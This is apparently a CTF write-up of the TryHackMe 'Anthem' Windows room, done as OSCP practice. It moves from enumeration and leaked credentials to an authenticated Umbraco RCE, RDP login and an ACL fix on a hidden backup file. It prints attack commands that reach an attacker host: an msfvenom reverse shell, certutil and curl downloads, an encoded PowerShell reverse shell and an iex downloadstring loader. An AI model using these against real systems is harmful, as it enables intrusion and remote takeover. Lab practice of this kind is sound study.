TryHackMe notes - Windows - 0x0A Anthem (easy)
Background
I have been preparing for the OSCP recently. Before my lab time starts I wanted to get some practice on boxes first, so I found an online list of OSCP-like machines:
| Tryhackme | | | |
|---|---|---|---|
| More guided and friendly approach for some rooms but still great boxes and rooms for prep. Active Directory ones here are very good practice for the OSCP. | | | |
| Linux | Windows | Active Directory and Networks | Other recommended rooms |
| Mr Robot | Attacktive Directory | SQL Injection Lab | |
| Thompson | Attacking Kerberos | Linux Privilege Escalation | |
| Kenobi | Wreath Network | Windows Privilege Escalation | |
| GameZone | Reset | Git Happens | |
| Skynet | Vulnnet: Active | NahamStore | |
| Daily bugle | Enterprise | | |
| Lazy admin | Ledger | | |
| Tomghost | Weasel (seems to have been removed by TryHackMe; I could not find it) | Recommended paths | |
| Rootme | Assumed Breach Scenarios: | Cyber Security 101 | |
| CMesS | Corp | Jr Penetration Tester | |
| Ultratech | Hack Smarter Security (harder) | Lateral Movement and Pivoting | Offensive Pentesting |
| Internal | Cyberlens | Exploiting Active Directory | |
| Zeno | | | |
| Boiler CTF | | | |
| Wonderland | | | |
| Silver Platter | | | |
| Year of the Jellyfish | | | |
The list is fairly long, 47 machines in total, so the plan is to do one or two a day and finish all of them within a month.
0x0A Anthem (easy)
Room description (quoted from the room):
This task involves you, paying attention to details and finding the 'keys to the castle'.
This room is designed for beginners, however, everyone is welcomed to try it out!
Enjoy the Anthem.
In this room, you don't need to brute force any login page. Just your preferred browser and Remote Desktop.
Please give the box up to 5 minutes to boot and configure.
Set the target as an environment variable
export TARGET=10.48.139.228
Reconnaissance
Port scan with rustscan driving nmap
rustscan -a $TARGET -r 1-65535 --ulimit 500 -- -sC -sV -T3 -Pn
Open 10.48.139.228:80
Open 10.48.139.228:3389
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
|_ssl-date: 2026-02-07T06:15:56+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: WIN-LU09299160F
| NetBIOS_Domain_Name: WIN-LU09299160F
| NetBIOS_Computer_Name: WIN-LU09299160F
| DNS_Domain_Name: WIN-LU09299160F
| DNS_Computer_Name: WIN-LU09299160F
| Product_Version: 10.0.17763
|_ System_Time: 2026-02-07T06:14:57+00:00
| ssl-cert: Subject: commonName=WIN-LU09299160F
| Issuer: commonName=WIN-LU09299160F
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-06T06:02:58
| Not valid after: 2026-08-08T06:02:58
| MD5: b50c adba 9157 e0bb 5c93 11c0 4b85 4192
| SHA-1: 80f7 7514 b6b6 087b 3659 fbf9 93d7 a06b 2788 9638
| SHA-256: 6c33 6611 e58a 44e5 7658 d490 5e84 b51b d611 3c58 0814 0803 fbcc aad9 c942 4d9d
| -----BEGIN CERTIFICATE-----
......
|_-----END CERTIFICATE-----
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Web access and directory scanning
The port scan found two open ports: 80 (HTTP) and 3389 (RDP). Only port 80 is a web port.
Browse to port 80

Directory scan with ffuf, using a SecLists wordlist
ffuf -u http://$TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -c

File scan
ffuf -u http://$TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -c

Website Analysis questions
This room has quite a few questions, so I will answer them all here; many of them are not very meaningful.
- What port is for the web server?
  Obviously 80.
- What port is for remote desktop service?
  Obviously 3389.
- What is a possible password in one of the pages web crawlers check for?
  The first line of robots.txt: UmbracoIsTheBest!
- What CMS is the website using?
  robots.txt also reveals umbraco.
- What is the domain of the website?
  Simply browsing to port 80 shows Anthem.com.
- What's the name of the Administrator
  The second post is about the administrator. The blog author is James Orchard Halliwell, but that is not the answer; searching the poem's lyrics turns up Solomon Grundy.

- Can we find find the email address of the administrator?
  The first post contains a recruiting contact, [email protected]. That is presumably HR's mailbox, but from the naming convention of that address and the answer to the previous question we can construct the administrator's address: [email protected]

Spot the flags questions
- What is flag 1?
  In the source of the first post

- What is flag 2?
  In the source of the home page

- What is flag 3?
  On jane-doe's profile page

- What is flag 4?
  In the source of the second post

Initial access
Logging in to the back office
The back office is at http://10.48.139.228/umbraco. Try logging in with the candidate credentials below:
| user | password |
|---|---|
| [email protected] | UmbracoIsTheBest! |
| Solomon Grundy | UmbracoIsTheBest! |
| SG | UmbracoIsTheBest! |
| James Orchard Halliwell | UmbracoIsTheBest! |
| [email protected] | UmbracoIsTheBest! |
| JOH | UmbracoIsTheBest! |
| [email protected] | UmbracoIsTheBest! |
| Jane Doe | UmbracoIsTheBest! |
| JD | UmbracoIsTheBest! |
Not many candidates, so I tried them by hand; [email protected]/UmbracoIsTheBest! logs in.

I poked around but did not find much of value.
Exploit
Look for a public exploit for this CMS
searchsploit umbraco
The first three entries are all RCE, but the first depends on Metasploit, so I am skipping it.

Entries 2 and 3 are RCE as well, but they are marked Authenticated, meaning they need valid back-office credentials. That is fine, since we have an account, so copy both exploits to the current directory:
searchsploit -m aspx/webapps/46153.py
searchsploit -m aspx/webapps/49488.py
A quick look at how each exploit expects to be used:
- 46153.py: edit the script directly and fill in the credentials and target URL.

  Its payload only pops calc, though, so I will leave it for now and come back if the other script does not work.
- 49488.py takes parameters and has a --help, so it can be run directly:
python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i 'http://10.48.139.228/' -c ipconfig

Commands execute, but -c must name an executable; cmd builtins such as cd cannot be passed to -c directly. They can be run this way instead:
python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i 'http://10.48.139.228/' -c powershell.exe -a '-NoProfile -Command pwd'
Getting an interactive shell (failed)
- Use msfvenom to generate a payload that does not need Metasploit to catch
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.196.107 LPORT=4444 -f exe -o win_re_nc_4444.exe
- Serve it over HTTP with Python
python3 -m http.server
- Start a penelope listener
python3 penelope.py -O
- Download and execute the reverse-shell binary
# Failed attempt: the whole certutil command placed in -c
python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i 'http://10.48.139.228/' -c 'certutil -urlcache -split -f http://192.168.196.107:8000/win_re_nc_4444.exe c:\windows\temp\win_re_nc_4444.exe'
# Because ipconfig had run fine, I assumed the entire command line could go into -c, but this errored. Looking it up, it was an escaping problem, and rereading the exploit showed that -c is the command to run and -a passes its arguments.
# certutil again, still an error
python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i "http://10.48.139.228/" -c cmd -a='certutil -urlcache -split -f http://192.168.196.107:8000/win_re_nc_4444.exe C:\\Windows\\Temp\\win_re_nc_4444.exe'
# curl gives no error
python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i "http://10.48.139.228/" -c curl -a='http://192.168.196.107:8000/win_re_nc_4444.exe -O C:\\Windows\\Temp\\win_re_nc_4444.exe'
# The HTTP server received the request, but the file still did not seem to land. I searched for a long time and tried all sorts of variations without success. Fine, fine, I will stop trying to upload a file.
# Decode with PowerShell directly instead. Payload generated at https://www.revshells.com/:
powershell -e ......
# Rewritten for the exploit:
python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i "http://10.48.139.228/" -c="powershell.exe" -a='-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEAOQA2AC4AMQAwADcAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'
# Blocked. Well played.
Not giving up yet, I tried a ps1 script instead. I found a write-up by a well-known blogger for an HTB box that is very similar to this one.
Invoke-PowerShellTcp.ps1 is only a script: loading it does nothing by itself. So I appended the reverse-shell call (Invoke-PowerShellTcp -Reverse -IPAddress 192.168.196.107 -Port 4444) at the end of the script, so that no parameters need to be passed at execution time.

Load it into memory and execute; the file never touches disk, which may get past the protection.
python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i "http://10.48.139.228/" -c "powershell.exe" -a "iex(new-object net.webclient).downloadstring('http://192.168.196.107:8000/re_win.ps1')"
OK, I surrender. It turns out I should not have forced this path. Bypassing the protection would probably have been possible with some effort, but this is an easy-rated box, and there is a much simpler route.
Remote Desktop
We have the administrator's credentials and 3389 is open, so why not just log in?
xfreerdp3 /v:$TARGET /u:[email protected] /p:UmbracoIsTheBest!
Not right. The @anthem.com form would be a domain (UPN) logon, and an easy box like this most likely has no domain, so try SG/UmbracoIsTheBest! instead:
xfreerdp3 /v:$TARGET /u:SG /p:UmbracoIsTheBest!

Fine, that gets us in. So what was all that effort to get an interactive shell for? 🤯
user.txt is on the desktop
Privilege escalation
Check privileges with whoami /priv: nothing useful.

Searching the file system. This one I did not expect: only after reading a write-up did I learn that there is a hidden backup folder in the root of C:.

Change the permissions. This feels a bit contrived: I am the owner of the file, yet I am not allowed to read it.

Just grant myself full control.


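An added example of mine, not the room's: the enumeration and ACL fix this step consists of, written out in PowerShell. The folder and file names are assumptions, since the write-up only shows screenshots of a hidden backup directory in the root of C: containing a file the current user owns but cannot read. The key fact is that an object's owner implicitly holds READ_CONTROL and WRITE_DAC, so the owner can always inspect and rewrite the DACL even when no entry grants read access.

```powershell
# Added example (mine, not from the room). C:\backup\restore.txt is an assumed
# path; substitute whatever the hidden folder on the box actually contains.

# --- 1. Find what a normal listing hides ------------------------------------
# Explorer and plain Get-ChildItem / dir skip Hidden and System items;
# -Force (dir /a in cmd) lists them.
Get-ChildItem -Path 'C:\' -Force -Directory |
    Where-Object { $_.Attributes -band [System.IO.FileAttributes]::Hidden } |
    Select-Object FullName, Attributes

$target = 'C:\backup\restore.txt'    # assumed location of the password file

# --- 2. See why the read fails: owner vs. DACL ------------------------------
# Get-Acl needs only READ_CONTROL, which the owner of an object always has.
$acl = Get-Acl -Path $target
"Owner: $($acl.Owner)"
$acl.Access | Format-Table IdentityReference, FileSystemRights, AccessControlType -AutoSize

# --- 3. As owner, grant yourself access -------------------------------------
# The owner also always holds WRITE_DAC, so even with no entry in the DACL the
# owner may rewrite it. cmd equivalent: icacls C:\backup\restore.txt /grant <user>:F
$me   = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$rule = New-Object System.Security.AccessControl.FileSystemAccessRule($me, 'FullControl', 'Allow')
$acl.AddAccessRule($rule)
Set-Acl -Path $target -AclObject $acl

# --- 4. The file now reads ----------------------------------------------------
Get-Content -Path $target
```

Run it inside the RDP session as the low-privileged user. If the file were owned by someone else the same trick would not work; then the usual route is a SeTakeOwnershipPrivilege or SeRestorePrivilege check in whoami /priv, which this box does not grant.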
Use the file's contents, ChangeMeBaby1MoreTime, as the administrator password and reconnect over RDP:
xfreerdp3 /v:$TARGET /u:administrator /p:ChangeMeBaby1MoreTime
root.txt is on the desktop
Summary
Watch for hidden files. When running an exploit, mind character escaping and keep the command as simple as possible. Do not get stuck on a single path.